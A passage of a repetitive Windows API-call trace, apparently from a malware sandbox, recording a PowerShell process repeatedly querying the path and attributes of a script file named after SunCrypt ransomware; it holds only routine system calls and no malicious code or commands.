ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.604] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701742069099) returned 1 [0104.604] EtwEventActivityIdControl () returned 0x0 [0104.604] EtwEventActivityIdControl () returned 0x0 [0104.604] EtwEventActivityIdControl () returned 0x0 [0104.604] EtwEventActivityIdControl () returned 0x0 [0104.604] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x398889b4, Data2=0x3f3f, Data3=0x4ee4, Data4=([0]=0x8a, [1]=0x78, [2]=0x80, [3]=0xf3, [4]=0xa8, [5]=0xad, [6]=0x95, [7]=0x3b))) returned 0x0 [0104.605] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.605] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701742170593) returned 1 [0104.605] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.605] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.605] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.606] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.606] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.611] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701742765481) returned 1 [0104.611] EtwEventActivityIdControl () returned 0x0 [0104.611] EtwEventActivityIdControl () returned 0x0 [0104.611] EtwEventActivityIdControl () returned 0x0 [0104.612] EtwEventActivityIdControl () returned 0x0 [0104.612] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7abdfb86, Data2=0xffeb, Data3=0x4135, Data4=([0]=0x93, [1]=0x7b, [2]=0xda, [3]=0x58, [4]=0xc7, [5]=0x9a, [6]=0xe8, [7]=0x94))) returned 0x0 [0104.612] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.612] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701742909221) returned 1 [0104.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.613] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.615] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701743207576) returned 1 [0104.616] EtwEventActivityIdControl () returned 0x0 [0104.616] EtwEventActivityIdControl () returned 0x0 [0104.616] EtwEventActivityIdControl () returned 0x0 [0104.616] EtwEventActivityIdControl () returned 0x0 [0104.616] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x9b0e72ee, Data2=0x59b7, Data3=0x40ed, Data4=([0]=0xb8, [1]=0xcb, [2]=0xf5, [3]=0x5e, [4]=0xe6, [5]=0xf4, [6]=0x42, [7]=0xfa))) returned 0x0 [0104.617] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.617] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701743352209) returned 1 [0104.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.617] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.619] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701743552015) returned 1 [0104.619] EtwEventActivityIdControl () returned 0x0 [0104.619] EtwEventActivityIdControl () returned 0x0 [0104.619] EtwEventActivityIdControl () returned 0x0 [0104.619] EtwEventActivityIdControl () returned 0x0 [0104.619] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xdef0f5e2, Data2=0x26dd, Data3=0x4187, Data4=([0]=0xb5, [1]=0xcf, [2]=0x44, [3]=0x2d, [4]=0x9f, [5]=0xb1, [6]=0xe4, [7]=0x81))) returned 0x0 [0104.620] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.620] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701743703130) returned 1 [0104.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.621] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.622] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701743907061) returned 1 [0104.623] EtwEventActivityIdControl () returned 0x0 [0104.623] EtwEventActivityIdControl () returned 0x0 [0104.623] EtwEventActivityIdControl () returned 0x0 [0104.623] EtwEventActivityIdControl () returned 0x0 [0104.623] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xb3912db, Data2=0xe526, Data3=0x4886, Data4=([0]=0xb1, [1]=0xf0, [2]=0xde, [3]=0x5c, [4]=0xa6, [5]=0x2f, [6]=0x5c, [7]=0x6c))) returned 0x0 [0104.623] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.624] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701744046988) returned 1 [0104.624] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.624] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.624] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.624] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.624] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.627] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701744358327) returned 1 [0104.627] EtwEventActivityIdControl () returned 0x0 [0104.627] EtwEventActivityIdControl () returned 0x0 [0104.627] EtwEventActivityIdControl () returned 0x0 [0104.627] EtwEventActivityIdControl () returned 0x0 [0104.627] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa985e60c, Data2=0x1d7f, Data3=0x451b, Data4=([0]=0x9d, [1]=0x2a, [2]=0xbe, [3]=0xad, [4]=0xa5, [5]=0x61, [6]=0xc, [7]=0xcc))) returned 0x0 [0104.628] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.628] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701744904877) returned 1 [0104.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.633] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.633] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.647] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701746314568) returned 1 [0104.647] EtwEventActivityIdControl () returned 0x0 [0104.647] EtwEventActivityIdControl () returned 0x0 [0104.647] EtwEventActivityIdControl () returned 0x0 [0104.647] EtwEventActivityIdControl () returned 0x0 [0104.648] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1f8326fc, Data2=0x56e, Data3=0x4616, Data4=([0]=0xb0, [1]=0xd7, [2]=0xaa, [3]=0x70, [4]=0x3, [5]=0x52, [6]=0x32, [7]=0x94))) returned 0x0 [0104.649] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.649] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701746569100) returned 1 [0104.649] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.649] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.649] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.650] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.650] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.651] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701746783091) returned 1 [0104.652] EtwEventActivityIdControl () returned 0x0 [0104.652] EtwEventActivityIdControl () returned 0x0 [0104.652] EtwEventActivityIdControl () returned 0x0 [0104.652] EtwEventActivityIdControl () returned 0x0 [0104.652] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x511a2f17, Data2=0x91ac, Data3=0x4e91, Data4=([0]=0x9e, [1]=0x2f, [2]=0x35, [3]=0xea, [4]=0xb9, [5]=0x40, [6]=0xf8, [7]=0xd2))) returned 0x0 [0104.653] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.653] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701746948600) returned 1 [0104.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.653] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.654] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.654] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.656] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701747276394) returned 1 [0104.656] EtwEventActivityIdControl () returned 0x0 [0104.656] EtwEventActivityIdControl () returned 0x0 [0104.656] EtwEventActivityIdControl () returned 0x0 [0104.657] EtwEventActivityIdControl () returned 0x0 [0104.657] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x5159228c, Data2=0xb456, Data3=0x48dd, Data4=([0]=0xbe, [1]=0x5d, [2]=0x25, [3]=0xa3, [4]=0xf7, [5]=0xc3, [6]=0x1c, [7]=0x99))) returned 0x0 [0104.657] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.658] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701747432470) returned 1 [0104.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.658] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.661] QueryPerformanceCounter (in: 